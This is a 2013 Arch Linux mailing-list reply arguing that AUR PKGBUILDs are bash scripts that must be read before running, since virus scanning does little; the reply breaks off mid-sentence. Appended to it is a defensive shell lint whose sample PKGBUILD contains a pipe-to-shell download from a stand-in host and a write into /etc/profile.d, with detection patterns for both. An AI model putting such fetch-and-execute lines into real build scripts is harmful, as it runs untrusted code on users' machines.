[arch-general] Integrating Virus Scanning for Packages Handled by Pacman

Daniel Micay danielmicay at gmail.com
Tue Apr 23 18:56:56 EDT 2013

On Tue, Apr 23, 2013 at 1:10 PM, Mark E. Lee <mark at markelee.com> wrote:
> While building packages on the AUR, I was wondering that except for
> manual user intervention (by reading the code), I didn't have any other
> methods of knowing if a package had malware or viruses. Hence, I was
> wondering if virus scanning via clamav should be called before pacman
> installs packages.
> --
> Mark E. Lee <mark at markelee.com>

The PKGBUILD itself is a bash script. If you're running them without
reading the code and checking that the sources are from an upstream
you trust, you're gonna have a bad time.

There are plenty of packages in the AUR that touch outside of $pkgdir
- but most seem to be beginner mistakes in good faith. ClamAV pretty
much just detects very common win32 viruses, because it's used on mail
servers to *reduce* the number of spread viruses.

If you really feel like scanning the package contents after you've
already trusted the PKGBUILD and build scripts, just don't use makepkg
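As an added example, not part of this thread or of any Arch tooling: a small POSIX shell lint that statically flags the two things the reply points at, sources not fetched over a trustworthy transport and build steps that reach outside $pkgdir/$srcdir. It assumes the usual `source=(...)` and `package() { ... }` layout; the sample PKGBUILD is constructed.

```shell
#!/bin/sh
# Added example (not an Arch tool): static pre-review lint for a PKGBUILD.
# A heuristic to prioritise human review of the script, not a substitute for it.

# Constructed sample: plain-http source, a write to /etc and a pipe-to-shell download.
SAMPLE_PKGBUILD='pkgname=example
pkgver=1.0
pkgrel=1
arch=("any")
source=("http://example.invalid/example-1.0.tar.gz")
sha256sums=("SKIP")

package() {
  install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
  cp "$srcdir/hook.sh" /etc/profile.d/hook.sh
  curl -s http://example.invalid/extra | bash
}'

# Count entries inside source=(...) fetched over http://, ftp:// or git://.
count_insecure_sources() {
  printf '%s\n' "$1" | awk '
    /^source=/ { insrc = 1 }
    insrc && /(http|ftp|git):\/\// { n++ }
    insrc && /\)/ { insrc = 0 }
    END { print n + 0 }'
}

# Count lines inside build/package/prepare/check that escape the build tree:
# a system path not rooted at $pkgdir/$srcdir, sudo, or a download piped into a shell.
count_build_escapes() {
  printf '%s\n' "$1" | awk '
    /^(build|package|prepare|check)\(\)/ { infn = 1; next }
    infn && /^}/ { infn = 0; next }
    infn && !/^[ \t]*#/ {
      for (i = 1; i <= NF; i++) {
        t = $i; gsub(/"/, "", t)
        if (t ~ /(pkgdir|srcdir|startdir)/) continue
        if (t ~ /^\/(etc|usr|home|root|var|opt|boot|bin|sbin|lib|tmp)(\/|$)/) { n++; break }
      }
      if ($0 ~ /(^|[ \t;|&])sudo[ \t]/) n++
      if ($0 ~ /(curl|wget)[^|]*\|[ \t]*(ba)?sh([ \t]|$)/) n++
    }
    END { print n + 0 }'
}
```

Run it on a real file with `count_build_escapes "$(cat PKGBUILD)"`; a zero result only means nothing matched the heuristics, so the script still needs reading.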
